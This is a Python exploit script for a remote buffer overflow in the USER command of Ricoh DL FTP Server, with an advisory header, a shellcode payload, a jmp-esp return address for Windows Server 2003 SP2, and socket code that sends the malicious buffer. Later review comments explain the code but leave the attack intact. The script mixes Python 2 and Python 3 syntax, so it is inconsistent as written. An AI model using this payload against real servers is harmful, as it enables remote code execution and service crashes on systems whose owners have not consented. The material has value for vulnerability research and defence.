'''
Information
--------------------
Name : Ricoh FTP Server <= v1.1.0.6
Software : Ricoh DL-1 SR10.exe
Vendor Homepage : http://www.ricohpmmc.com/
Vulnerability Type : Remote Buffer Overflow
Severity : High
Researcher : Juan Sacco (Runlvl) <jsacco [at] exploitpack [dot] com>

Description
------------------

Ricoh DL FTP Server is prone to a remote buffer-overflow vulnerability
because it fails to perform adequate boundary-checks on user-supplied
data.
Successful exploitation of this bug could allow an attacker to execute
arbitrary code within the context of the affected application. Failed
exploit attempts could result in a denial-of-service condition.


Exploit example as follows
-----------------------------
Basic structure: JUNK + JMPIP + NOPS + SHELLCODE
Vulnerable command: USER

!/usr/bin/python
Based on the work of Julien Ahrens:
https://www.exploit-db.com/exploits/18643/
'''
import os
import socket
import sys


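def howtousage():
    """Print the expected command line and terminate the process.

    Called when fewer than two positional arguments (host, port) are
    supplied. Exits with status -1, matching the original script.
    The message uses the function form of ``print`` so the file behaves
    the same whether it is run under Python 2 or Python 3.
    """
    print("Sorry, expecting arguments: host port")
    sys.exit(-1)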

def run() -> None:
    """Send the oversized USER command described in the module docstring.

    Reads the module-level ``Host`` and ``Port`` globals assigned in the
    ``__main__`` block; if they were never set, the resulting NameError is
    swallowed by the bare ``except`` below. Every failure (refused
    connection, timeout, parse error, unset globals) prints the same
    "Target not vulnerable" line, so the output cannot distinguish a
    patched server from a network problem.
    """
    try:
        # Payload bytes reproduced from the original listing; the layout is
        # JUNK + JMPIP + NOPS + SHELLCODE as stated in the module header.
        shell = "\xba\xc9\xd2\x95\xec\xda\xd8\xd9\x74\x24\xf4\x5b\x33"
        shell += "\xc9\xb1\x44\x83\xc3\x04\x31\x53\x0f\x03\x53\xc6\x30"
        shell += "\x60\x10\x30\x36\x8b\xe9\xc0\x57\x05\x0c\xf1\x57\x71"
        shell += "\x44\xa1\x67\xf1\x08\x4d\x03\x57\xb9\xc6\x61\x70\xce"
        shell += "\x6f\xcf\xa6\xe1\x70\x7c\x9a\x60\xf2\x7f\xcf\x42\xcb"
        shell += "\x4f\x02\x82\x0c\xad\xef\xd6\xc5\xb9\x42\xc7\x62\xf7"
        shell += "\x5e\x6c\x38\x19\xe7\x91\x88\x18\xc6\x07\x83\x42\xc8"
        shell += "\xa6\x40\xff\x41\xb1\x85\x3a\x1b\x4a\x7d\xb0\x9a\x9a"
        shell += "\x4c\x39\x30\xe3\x61\xc8\x48\x23\x45\x33\x3f\x5d\xb6"
        shell += "\xce\x38\x9a\xc5\x14\xcc\x39\x6d\xde\x76\xe6\x8c\x33"
        shell += "\xe0\x6d\x82\xf8\x66\x29\x86\xff\xab\x41\xb2\x74\x4a"
        shell += "\x86\x33\xce\x69\x02\x18\x94\x10\x13\xc4\x7b\x2c\x43"
        shell += "\xa7\x24\x88\x0f\x45\x30\xa1\x4d\x03\xc7\x37\xe8\x61"
        shell += "\xc7\x47\xf3\xd5\xa0\x76\x78\xba\xb7\x86\xab\xff\x48"
        shell += "\xcd\xf6\xa9\xc0\x88\x62\xe8\x8c\x2a\x59\x2e\xa9\xa8"
        shell += "\x68\xce\x4e\xb0\x18\xcb\x0b\x76\xf0\xa1\x04\x13\xf6"
        shell += "\x16\x24\x36\x95\xf5\xbe\x97\x3f\x7d\x5a\xc8\x90\x1e"
        shell += "\x84\x66\x8a\x94\xe4\x03\x27\x31\x97\xcb\xb5\xd0\x34"
        shell += "\x63\x52\x02\xe9\x12\xc1\x2d\x65\xd4\x34\x81\x43\x36"
        shell += "\x18\xa0\xef\x72\x46\x04\xd6\x5a\xe8\x2d\x62\xbb\x98"
        shell += "\xc2\xe9\xda\x0c\x7b\x9c\x73\xb8\xf3\x40\xcd\x26\x9e"
        shell += "\xe9\xa3\xcf\x13\x9e\x49\x71\xa7\x31\xdc\x02\x67\xbc"
        shell += "\x49\x86\x08\x28\xaa\x67\x97\xec\xee\x77"
        # User: ricoh
        # Pass: Ricoh1106
        # NOTE(review): the credentials above are not referenced anywhere in
        # this script; the USER line below is sent unauthenticated.

        # 245 filler bytes; the offset is specific to the build named in the
        # module header and is not derived at runtime.
        junk = "\x61" * 245
        # Little-endian encoding of 0x77D20738 — valid only for the exact
        # USER32.DLL build named below; any other OS/service pack/language
        # maps this address differently, so the send merely crashes the
        # service (the denial-of-service outcome noted in the header).
        jmp = "\x38\x07\xD2\x77"  # jmp esp from user32.dll # Windows Server 2003 Standard Edition SP2 English USER32.DLL jmp esp 0x77D20738 G DV UV
        # 16-byte NOP sled placed directly ahead of the payload.
        nops = "\x90" * 16

        buffer = junk + jmp + nops + shell
        # Single unauthenticated exchange: connect, read up to 1024 bytes
        # (presumably the server greeting — not checked), send one USER
        # line, close. A USER argument several hundred bytes long, sent
        # immediately after the greeting, is the observable on the wire.
        s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s1.connect((Host, int(Port)))
        s1.recv(1024)
        s1.send('USER ' + buffer + '\r\n')
        s1.close()
        # Printed after a successful send only; nothing verifies the effect
        # on the server.
        print "Exploit executed successfully"
    except:
        # Bare except: also catches KeyboardInterrupt, SystemExit and the
        # NameError raised when Host/Port were never assigned, and leaves
        # the socket unclosed if connect() or send() raised.
        print "Target not vulnerable or connection closed"

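if __name__ == '__main__':
    # Banner text retained verbatim; function-form print behaves the same
    # on Python 2 and Python 3 for a single string argument.
    print("Ricoh DC FTP Server <= v1.1.0.6 Remote Buffer Overflow")
    print("Author: Juan Sacco")

    # Host and Port are module globals read by run(). howtousage() exits
    # the process with -1 when either positional argument is missing, so
    # run() below is only reached with both set.
    try:
        Host = sys.argv[1]
        Port = sys.argv[2]
    except IndexError:
        howtousage()
    # Moved under the __main__ guard: the original called run() at module
    # level, so merely importing this file executed the routine with
    # Host/Port unset, a NameError that run()'s bare except reports as
    # "Target not vulnerable or connection closed".
    run()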